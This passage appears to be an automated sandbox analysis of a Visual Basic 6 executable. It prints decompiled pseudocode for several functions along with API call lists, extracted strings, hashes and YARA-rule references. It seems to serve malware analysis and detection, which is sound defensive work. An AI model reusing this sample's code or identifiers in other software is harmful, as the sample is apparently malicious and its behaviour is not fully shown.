				L0040154E();
				if(0 != 0) {
					_t82 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0x2c32);
					asm("fclex");
					_v68 = _t82;
					if(_v68 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x15c);
						_push(0x4024b8);
						_push(_a4);
						_push(_v68);
						L00401596();
						_v88 = _t82;
					}
				}
				if( *0x410010 != 0) {
					_v92 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x401d7c);
					L0040156C();
					_v92 = 0x410010;
				}
				_t72 =  &_v28;
				L00401572();
				_v68 = _t72;
				_t76 =  *((intOrPtr*)( *_v68 + 0xf0))(_v68,  &_v32, _t72,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x30c))( *_v92));
				asm("fclex");
				_v72 = _t76;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x402d00);
					_push(_v68);
					_push(_v72);
					L00401596();
					_v96 = _t76;
				}
				_push(0);
				_push(0);
				_push(_v32);
				_t77 =  &_v48;
				_push(_t77);
				L00401578();
				_push(_t77);
				L0040157E();
				_v24 = _t77;
				_push( &_v32);
				_t79 =  &_v28;
				_push(_t79);
				_push(2);
				L00401560();
				L0040155A();
				_push(0x40e19b);
				return _t79;
			}

0x0040dfaf
0x0040dfba
0x0040dfbb
0x0040dfc2
0x0040dfc5
0x0040dfcd
0x0040dfd0
0x0040dfde
0x0040dff8
0x0040dfe0
0x0040dfe0
0x0040dfe5
0x0040dfea
0x0040dfef
0x0040dfef
0x0040e013
0x0040e017
0x0040e01c
0x0040e01f
0x0040e026
0x0040e030
0x0040e03a
0x0040e03b
0x0040e03c
0x0040e03d
0x0040e046
0x0040e04c
0x0040e04e
0x0040e055
0x0040e071
0x0040e057
0x0040e057
0x0040e05c
0x0040e061
0x0040e064
0x0040e067
0x0040e06c
0x0040e06c
0x0040e078
0x0040e081
0x0040e090
0x0040e096
0x0040e098
0x0040e09f
0x0040e0bb
0x0040e0a1
0x0040e0a1
0x0040e0a6
0x0040e0ab
0x0040e0ae
0x0040e0b1
0x0040e0b6
0x0040e0b6
0x0040e09f
0x0040e0c6
0x0040e0e0
0x0040e0c8
0x0040e0c8
0x0040e0cd
0x0040e0d2
0x0040e0d7
0x0040e0d7
0x0040e0fb
0x0040e0ff
0x0040e104
0x0040e113
0x0040e119
0x0040e11b
0x0040e122
0x0040e13e
0x0040e124
0x0040e124
0x0040e129
0x0040e12e
0x0040e131
0x0040e134
0x0040e139
0x0040e139
0x0040e142
0x0040e144
0x0040e146
0x0040e149
0x0040e14c
0x0040e14d
0x0040e155
0x0040e156
0x0040e15b
0x0040e161
0x0040e162
0x0040e165
0x0040e166
0x0040e168
0x0040e173
0x0040e178
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040DFC5
__vbaNew2.MSVBVM60(00401D7C,00410010,?,?,?,?,004013B6), ref: 0040DFEA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E017
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E030
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D10,00000220), ref: 0040E067
__vbaFreeObj.MSVBVM60(00000000,?,00402D10,00000220), ref: 0040E078
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,0000015C), ref: 0040E0B1
__vbaNew2.MSVBVM60(00401D7C,00410010), ref: 0040E0D2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E0FF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D00,000000F0), ref: 0040E134
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E14D
__vbaI4Var.MSVBVM60(00000000), ref: 0040E156
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000), ref: 0040E168
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0040E173

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2$CallLateList
String ID:
API String ID: 2235576293-0
Opcode ID: b6789af250caeee71be218c4d29076b2c8158a012cbde93862e4357e1a05c76d
Instruction ID: 0d3d111a4ff54b40db4b0119d84f743bf372c12eaa6745aab81b7094dfb9e08b
Opcode Fuzzy Hash: b6789af250caeee71be218c4d29076b2c8158a012cbde93862e4357e1a05c76d
Instruction Fuzzy Hash: 4551F470E40218EFDB10DFA1DC4AB9DBBB4BF08704F10442AF502BB2E1D7B9A9559B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E52D, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040E52D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v52;
				char _v68;
				char _v84;
				char* _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				char _v132;
				void* _v136;
				signed int _v140;
				intOrPtr* _v152;
				signed int _v156;
				short _t49;
				signed int _t52;
				char* _t55;
				char* _t56;
				void* _t66;
				void* _t68;
				intOrPtr _t69;

				_t69 = _t68 - 0xc;
				 *[fs:0x0] = _t69;
				L004013B0();
				_v16 = _t69;
				_v12 = 0x4012c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013b6, _t66);
				_v108 = L"2-2-2";
				_v116 = 8;
				L004014D6();
				_push( &_v68);
				_push( &_v84);
				L0040148E();
				_v124 = 2;
				_v132 = 0x8002;
				_push( &_v84);
				_t49 =  &_v132;
				_push(_t49);
				L004014E2();
				_v136 = _t49;
				_push( &_v84);
				_push( &_v68);
				_push(2);
				L00401536();
				_t52 = _v136;
				if(_t52 != 0) {
					if( *0x410438 != 0) {
						_v152 = 0x410438;
					} else {
						_push(0x410438);
						_push(0x402d40);
						L0040156C();
						_v152 = 0x410438;
					}
					_v136 =  *_v152;
					_t55 =  &_v48;
					L00401482();
					_t56 =  &_v52;
					L00401488();
					_t52 =  *((intOrPtr*)( *_v136 + 0x10))(_v136, _t56, _t56, _t55, _t55);
					asm("fclex");
					_v140 = _t52;
					if(_v140 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x402d30);
						_push(_v136);
						_push(_v140);
						L00401596();
						_v156 = _t52;
					}
					L0040154E();
				}
				_v32 = 0xb53c3b60;
				_v28 = 0x5af9;
				_push(0x40e6b6);
				L0040155A();
				return _t52;
			}

0x0040e530
0x0040e53f
0x0040e54b
0x0040e553
0x0040e556
0x0040e55d
0x0040e56c
0x0040e56f
0x0040e576
0x0040e583
0x0040e58b
0x0040e58f
0x0040e590
0x0040e595
0x0040e59c
0x0040e5a6
0x0040e5a7
0x0040e5aa
0x0040e5ab
0x0040e5b0
0x0040e5ba
0x0040e5be
0x0040e5bf
0x0040e5c1
0x0040e5c9
0x0040e5d2
0x0040e5df
0x0040e5fc
0x0040e5e1
0x0040e5e1
0x0040e5e6
0x0040e5eb
0x0040e5f0
0x0040e5f0
0x0040e60e
0x0040e614
0x0040e618
0x0040e61e
0x0040e622
0x0040e636
0x0040e639
0x0040e63b
0x0040e648
0x0040e66a
0x0040e64a
0x0040e64a
0x0040e64c
0x0040e651
0x0040e657
0x0040e65d
0x0040e662
0x0040e662
0x0040e674
0x0040e674
0x0040e679
0x0040e680
0x0040e687
0x0040e6b0
0x0040e6b5

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040E54B
__vbaVarDup.MSVBVM60 ref: 0040E583
#545.MSVBVM60(?,?), ref: 0040E590
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040E5AB
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040E5C1
__vbaNew2.MSVBVM60(00402D40,00410438,?,?,004013B6), ref: 0040E5EB
__vbaObjVar.MSVBVM60(?), ref: 0040E618
__vbaObjSetAddref.MSVBVM60(?,00000000,?), ref: 0040E622
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,00000010), ref: 0040E65D
__vbaFreeObj.MSVBVM60(00000000,?,00402D30,00000010), ref: 0040E674
__vbaFreeVar.MSVBVM60(0040E6B6), ref: 0040E6B0

Strings

2-2-2, xrefs: 0040E56F

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#545AddrefCheckChkstkHresultListNew2
String ID: 2-2-2
API String ID: 1438816014-2156482953
Opcode ID: ed454947b0bcbbd828e680c3921318d21b820e326dc42d60b06a07315afdd888
Instruction ID: 080cfe1c8b922f991a4ca47c14293d989259c06c26f2d6d6ad6bdfd647197ee7
Opcode Fuzzy Hash: ed454947b0bcbbd828e680c3921318d21b820e326dc42d60b06a07315afdd888
Instruction Fuzzy Hash: 03413070800228ABDB10EFA5CD85FDEB7B8BF04704F5084AAF145B71A1DB785A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3A4, Relevance: 19.6, APIs: 13, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040F3A4(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v32;
				void* _v36;
				char _v52;
				char _v68;
				char _v84;
				signed int _v108;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v140;
				signed int _v144;
				signed int _v148;
				char* _t53;
				short _t57;
				signed int _t61;
				signed int _t67;
				intOrPtr _t82;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t82;
				L004013B0();
				_v12 = _t82;
				_v8 = 0x401380;
				_push( &_v52);
				L0040144C();
				_push( &_v52);
				_t53 =  &_v32;
				_push(_t53);
				L00401452();
				_push(_t53);
				_push( &_v68);
				L00401458();
				_push( &_v84);
				L0040144C();
				_push( &_v68);
				_t57 =  &_v84;
				_push(_t57);
				L004014E2();
				_v120 = _t57;
				L00401512();
				_push( &_v84);
				_push( &_v68);
				_push( &_v52);
				_push(3);
				L00401536();
				_t61 = _v120;
				if(_t61 != 0) {
					if( *0x410438 != 0) {
						_v140 = 0x410438;
					} else {
						_push(0x410438);
						_push(0x402d40);
						L0040156C();
						_v140 = 0x410438;
					}
					_v120 =  *_v140;
					_t67 =  *((intOrPtr*)( *_v120 + 0x4c))(_v120,  &_v36);
					asm("fclex");
					_v124 = _t67;
					if(_v124 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x402d30);
						_push(_v120);
						_push(_v124);
						L00401596();
						_v144 = _t67;
					}
					_v128 = _v36;
					_v108 = _v108 & 0x00000000;
					_v116 = 2;
					L004013B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t61 =  *((intOrPtr*)( *_v128 + 0x2c))(_v128, 0x10);
					asm("fclex");
					_v132 = _t61;
					if(_v132 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x2c);
						_push(0x402f70);
						_push(_v128);
						_push(_v132);
						L00401596();
						_v148 = _t61;
					}
					L0040154E();
				}
				_v28 =  *0x401378;
				asm("wait");
				_push(0x40f549);
				return _t61;
			}

0x0040f3a9
0x0040f3b4
0x0040f3b5
0x0040f3c1
0x0040f3c9
0x0040f3cc
0x0040f3d6
0x0040f3d7
0x0040f3df
0x0040f3e0
0x0040f3e3
0x0040f3e4
0x0040f3e9
0x0040f3ed
0x0040f3ee
0x0040f3f6
0x0040f3f7
0x0040f3ff
0x0040f400
0x0040f403
0x0040f404
0x0040f409
0x0040f410
0x0040f418
0x0040f41c
0x0040f420
0x0040f421
0x0040f423
0x0040f42b
0x0040f431
0x0040f43e
0x0040f45b
0x0040f440
0x0040f440
0x0040f445
0x0040f44a
0x0040f44f
0x0040f44f
0x0040f46d
0x0040f47c
0x0040f47f
0x0040f481
0x0040f488
0x0040f4a4
0x0040f48a
0x0040f48a
0x0040f48c
0x0040f491
0x0040f494
0x0040f497
0x0040f49c
0x0040f49c
0x0040f4ae
0x0040f4b1
0x0040f4b5
0x0040f4bf
0x0040f4c9
0x0040f4ca
0x0040f4cb
0x0040f4cc
0x0040f4d5
0x0040f4d8
0x0040f4da
0x0040f4e1
0x0040f4fd
0x0040f4e3
0x0040f4e3
0x0040f4e5
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x0040f4f5
0x0040f4f5
0x0040f507
0x0040f507
0x0040f512
0x0040f515
0x0040f516
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040F3C1
#610.MSVBVM60(?,?,?,?,?,004013B6), ref: 0040F3D7
__vbaStrVarVal.MSVBVM60(?,?,?,?,?,?,?,004013B6), ref: 0040F3E4
#540.MSVBVM60(?,00000000,?,?,?,?,?,?,?,004013B6), ref: 0040F3EE
#610.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,004013B6), ref: 0040F3F7
__vbaVarTstNe.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,004013B6), ref: 0040F404
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,004013B6), ref: 0040F410
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040F423
__vbaNew2.MSVBVM60(00402D40,00410438), ref: 0040F44A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,0000004C), ref: 0040F497
__vbaChkstk.MSVBVM60(00000000,?,00402D30,0000004C), ref: 0040F4BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402F70,0000002C), ref: 0040F4F0
__vbaFreeObj.MSVBVM60(00000000,?,00402F70,0000002C), ref: 0040F507

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#610CheckChkstkHresult$#540ListNew2
String ID:
API String ID: 3669578713-0
Opcode ID: c0894a47141048828e353b598e2a8983446b169fc5ad5813b7a04e5f9d8518f2
Instruction ID: 92a658a2b4855b6e3186e1a10d0a311bbbfb332c0a99473bf78629aa7a4d1349
Opcode Fuzzy Hash: c0894a47141048828e353b598e2a8983446b169fc5ad5813b7a04e5f9d8518f2
Instruction Fuzzy Hash: 9241D871900218ABDB21EFA1CD85FDEB7B8BF08704F60417EE501B71A2DBB859489F55

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6E3, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040E6E3(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				short _v56;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _t83;
				signed int _t88;
				signed int _t92;
				signed int _t96;
				char* _t100;
				void* _t108;
				void* _t110;
				intOrPtr _t111;

				_t111 = _t110 - 0xc;
				 *[fs:0x0] = _t111;
				L004013B0();
				_v16 = _t111;
				_v12 = 0x4012d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x4013b6, _t108);
				if( *0x410438 != 0) {
					_v72 = 0x410438;
				} else {
					_push(0x410438);
					_push(0x402d40);
					L0040156C();
					_v72 = 0x410438;
				}
				_v40 =  *_v72;
				_t83 =  *((intOrPtr*)( *_v40 + 0x4c))(_v40,  &_v28);
				asm("fclex");
				_v44 = _t83;
				if(_v44 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x402d30);
					_push(_v40);
					_push(_v44);
					L00401596();
					_v76 = _t83;
				}
				_v48 = _v28;
				_t88 =  *((intOrPtr*)( *_v48 + 0x20))(_v48,  &_v36);
				asm("fclex");
				_v52 = _t88;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x20);
					_push(0x402f70);
					_push(_v48);
					_push(_v52);
					L00401596();
					_v80 = _t88;
				}
				_v56 =  ~(0 | _v36 != 0x00000000);
				L0040154E();
				_t92 = _v56;
				if(_t92 != 0) {
					_t96 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v28);
					asm("fclex");
					_v40 = _t96;
					if(_v40 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x4024b8);
						_push(_a4);
						_push(_v40);
						L00401596();
						_v84 = _t96;
					}
					if( *0x410438 != 0) {
						_v88 = 0x410438;
					} else {
						_push(0x410438);
						_push(0x402d40);
						L0040156C();
						_v88 = 0x410438;
					}
					_v44 =  *_v88;
					_v68 = _v28;
					_v28 = _v28 & 0x00000000;
					_t100 =  &_v32;
					L00401572();
					_t92 =  *((intOrPtr*)( *_v44 + 0x40))(_v44, _t100, _t100, _v68, L"UPAAKALDT");
					asm("fclex");
					_v48 = _t92;
					if(_v48 >= 0) {
						_v92 = _v92 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x402d30);
						_push(_v44);
						_push(_v48);
						L00401596();
						_v92 = _t92;
					}
					L0040154E();
				}
				_push(0x40e8c1);
				return _t92;
			}

0x0040e6e6
0x0040e6f5
0x0040e6ff
0x0040e707
0x0040e70a
0x0040e711
0x0040e720
0x0040e72a
0x0040e744
0x0040e72c
0x0040e72c
0x0040e731
0x0040e736
0x0040e73b
0x0040e73b
0x0040e750
0x0040e75f
0x0040e762
0x0040e764
0x0040e76b
0x0040e784
0x0040e76d
0x0040e76d
0x0040e76f
0x0040e774
0x0040e777
0x0040e77a
0x0040e77f
0x0040e77f
0x0040e78b
0x0040e79a
0x0040e79d
0x0040e79f
0x0040e7a6
0x0040e7bf
0x0040e7a8
0x0040e7a8
0x0040e7aa
0x0040e7af
0x0040e7b2
0x0040e7b5
0x0040e7ba
0x0040e7ba
0x0040e7ce
0x0040e7d5
0x0040e7da
0x0040e7e0
0x0040e7f2
0x0040e7f8
0x0040e7fa
0x0040e801
0x0040e81d
0x0040e803
0x0040e803
0x0040e808
0x0040e80d
0x0040e810
0x0040e813
0x0040e818
0x0040e818
0x0040e828
0x0040e842
0x0040e82a
0x0040e82a
0x0040e82f
0x0040e834
0x0040e839
0x0040e839
0x0040e84e
0x0040e854
0x0040e857
0x0040e863
0x0040e867
0x0040e875
0x0040e878
0x0040e87a
0x0040e881
0x0040e89a
0x0040e883
0x0040e883
0x0040e885
0x0040e88a
0x0040e88d
0x0040e890
0x0040e895
0x0040e895
0x0040e8a1
0x0040e8a1
0x0040e8a6
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040E6FF
__vbaNew2.MSVBVM60(00402D40,00410438,?,?,?,?,004013B6), ref: 0040E736
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,0000004C), ref: 0040E77A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402F70,00000020), ref: 0040E7B5
__vbaFreeObj.MSVBVM60 ref: 0040E7D5
__vbaHresultCheckObj.MSVBVM60(00000000,004012D0,004024B8,00000160), ref: 0040E813
__vbaNew2.MSVBVM60(00402D40,00410438), ref: 0040E834
__vbaObjSet.MSVBVM60(?,?,UPAAKALDT), ref: 0040E867
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402D30,00000040), ref: 0040E890
__vbaFreeObj.MSVBVM60 ref: 0040E8A1

Strings

UPAAKALDT, xrefs: 0040E85B

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$Chkstk
String ID: UPAAKALDT
API String ID: 2989710064-545945885
Opcode ID: 52bde5dc0787a1426cbb2785047084ca84e000231d660d4bc373a84173566e17
Instruction ID: 0641e6e1d5fe1eb8a721b01c2ae1b3180586f26b19ee6c8d4842cfb692541fb0
Opcode Fuzzy Hash: 52bde5dc0787a1426cbb2785047084ca84e000231d660d4bc373a84173566e17
Instruction Fuzzy Hash: 9551E671D00218EFDB00DFA5C989BDDBBF4BF08715F10846AE501BB2A0D3B99995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F02B, Relevance: 18.1, APIs: 12, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040F02B(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _t39;
				signed int _t47;
				signed int _t51;
				signed int _t54;
				intOrPtr _t70;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t70;
				_t39 = 0x30;
				L004013B0();
				_v12 = _t70;
				_v8 = 0x401348;
				_push(0x403004);
				L0040145E();
				_push(_t39);
				L00401464();
				L00401548();
				_push(_t39);
				_push(0x403010);
				L004014AC();
				asm("sbb eax, eax");
				_v48 =  ~( ~( ~_t39));
				L00401512();
				if(_v48 != 0) {
					_t54 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v48 = _t54;
					if(_v48 >= 0) {
						_v60 = _v60 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x4024e8);
						_push(_a4);
						_push(_v48);
						L00401596();
						_v60 = _t54;
					}
				}
				if( *0x410010 != 0) {
					_v64 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x401d7c);
					L0040156C();
					_v64 = 0x410010;
				}
				_t47 =  &_v28;
				L00401572();
				_v48 = _t47;
				_v36 = 1;
				_v44 = 2;
				L004013B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t51 =  *((intOrPtr*)( *_v48 + 0x228))(_v48, 0x10, _t47,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x308))( *_v64));
				asm("fclex");
				_v52 = _t51;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x228);
					_push(0x402d10);
					_push(_v48);
					_push(_v52);
					L00401596();
					_v68 = _t51;
				}
				L0040154E();
				_push(0x40f18d);
				return _t51;
			}

0x0040f030
0x0040f03b
0x0040f03c
0x0040f045
0x0040f046
0x0040f04e
0x0040f051
0x0040f058
0x0040f05d
0x0040f062
0x0040f063
0x0040f06d
0x0040f072
0x0040f073
0x0040f078
0x0040f07f
0x0040f085
0x0040f08c
0x0040f097
0x0040f0a1
0x0040f0a7
0x0040f0ae
0x0040f0ca
0x0040f0b0
0x0040f0b0
0x0040f0b5
0x0040f0ba
0x0040f0bd
0x0040f0c0
0x0040f0c5
0x0040f0c5
0x0040f0ae
0x0040f0d5
0x0040f0ef
0x0040f0d7
0x0040f0d7
0x0040f0dc
0x0040f0e1
0x0040f0e6
0x0040f0e6
0x0040f10a
0x0040f10e
0x0040f113
0x0040f116
0x0040f11d
0x0040f127
0x0040f131
0x0040f132
0x0040f133
0x0040f134
0x0040f13d
0x0040f143
0x0040f145
0x0040f14c
0x0040f168
0x0040f14e
0x0040f14e
0x0040f153
0x0040f158
0x0040f15b
0x0040f15e
0x0040f163
0x0040f163
0x0040f16f
0x0040f174
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040F046
__vbaI4Str.MSVBVM60(00403004,?,?,?,?,004013B6), ref: 0040F05D
#537.MSVBVM60(00000000,00403004,?,?,?,?,004013B6), ref: 0040F063
__vbaStrMove.MSVBVM60(00000000,00403004,?,?,?,?,004013B6), ref: 0040F06D
__vbaStrCmp.MSVBVM60(00403010,00000000,00000000,00403004,?,?,?,?,004013B6), ref: 0040F078
__vbaFreeStr.MSVBVM60(00403010,00000000,00000000,00403004,?,?,?,?,004013B6), ref: 0040F08C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024E8,00000710,?,?,?,?,?,?,?,?,004013B6), ref: 0040F0C0
__vbaNew2.MSVBVM60(00401D7C,00410010,00403010,00000000,00000000,00403004,?,?,?,?,004013B6), ref: 0040F0E1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00403010,00000000,00000000,00403004,?,?,?,?,004013B6), ref: 0040F10E
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,00403010,00000000,00000000,00403004,?,?,?,?,004013B6), ref: 0040F127
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D10,00000228,?,?,?,?,00403010,00000000,00000000,00403004), ref: 0040F15E
__vbaFreeObj.MSVBVM60(?,?,?,?,00403010,00000000,00000000,00403004,?,?,?,?,004013B6), ref: 0040F16F

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresult$#537MoveNew2
String ID:
API String ID: 2151101922-0
Opcode ID: a00eb6c7b96ec38b9e312714e5399944fdcdeea596f53a4245bd3f310ab84064
Instruction ID: c8b50ae3a697d147ae903189e88f03d03f32f9afb333e0fa39ea99ee02e520d5
Opcode Fuzzy Hash: a00eb6c7b96ec38b9e312714e5399944fdcdeea596f53a4245bd3f310ab84064
Instruction Fuzzy Hash: 63412B70D40208AFDB10DFA5D846BEDBBB4BF08715F10853AF502BB2E1DBB959448B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E97C, Relevance: 16.6, APIs: 11, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040E97C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				void* _v32;
				char _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				char* _t42;
				signed int _t48;
				signed int _t53;
				intOrPtr _t66;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_push(0x40);
				L004013B0();
				_v12 = _t66;
				_v8 = 0x4012f0;
				_push(0x402f9c);
				L00401530();
				asm("fcomp qword [0x401200]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x410438 != 0) {
						_v76 = 0x410438;
					} else {
						_push(0x410438);
						_push(0x402d40);
						L0040156C();
						_v76 = 0x410438;
					}
					_v56 =  *_v76;
					_t48 =  *((intOrPtr*)( *_v56 + 0x1c))(_v56,  &_v32);
					asm("fclex");
					_v60 = _t48;
					if(_v60 >= 0) {
						_t16 =  &_v80;
						 *_t16 = _v80 & 0x00000000;
						__eflags =  *_t16;
					} else {
						_push(0x1c);
						_push(0x402d30);
						_push(_v56);
						_push(_v60);
						L00401596();
						_v80 = _t48;
					}
					_v64 = _v32;
					_t53 =  *((intOrPtr*)( *_v64 + 0x64))(_v64, 1,  &_v52);
					asm("fclex");
					_v68 = _t53;
					if(_v68 >= 0) {
						_t29 =  &_v84;
						 *_t29 = _v84 & 0x00000000;
						__eflags =  *_t29;
					} else {
						_push(0x64);
						_push(0x402d50);
						_push(_v64);
						_push(_v68);
						L00401596();
						_v84 = _t53;
					}
					_v28 = _v52;
					L0040154E();
				}
				_push( &_v48);
				L00401470();
				_t42 =  &_v48;
				_push(_t42);
				L00401476();
				L00401548();
				L0040155A();
				asm("wait");
				_push(0x40eaba);
				L00401512();
				return _t42;
			}

0x0040e981
0x0040e98c
0x0040e98d
0x0040e994
0x0040e997
0x0040e99f
0x0040e9a2
0x0040e9a9
0x0040e9ae
0x0040e9b3
0x0040e9b9
0x0040e9bb
0x0040e9bc
0x0040e9c9
0x0040e9e3
0x0040e9cb
0x0040e9cb
0x0040e9d0
0x0040e9d5
0x0040e9da
0x0040e9da
0x0040e9ef
0x0040e9fe
0x0040ea01
0x0040ea03
0x0040ea0a
0x0040ea23
0x0040ea23
0x0040ea23
0x0040ea0c
0x0040ea0c
0x0040ea0e
0x0040ea13
0x0040ea16
0x0040ea19
0x0040ea1e
0x0040ea1e
0x0040ea2a
0x0040ea3b
0x0040ea3e
0x0040ea40
0x0040ea47
0x0040ea60
0x0040ea60
0x0040ea60
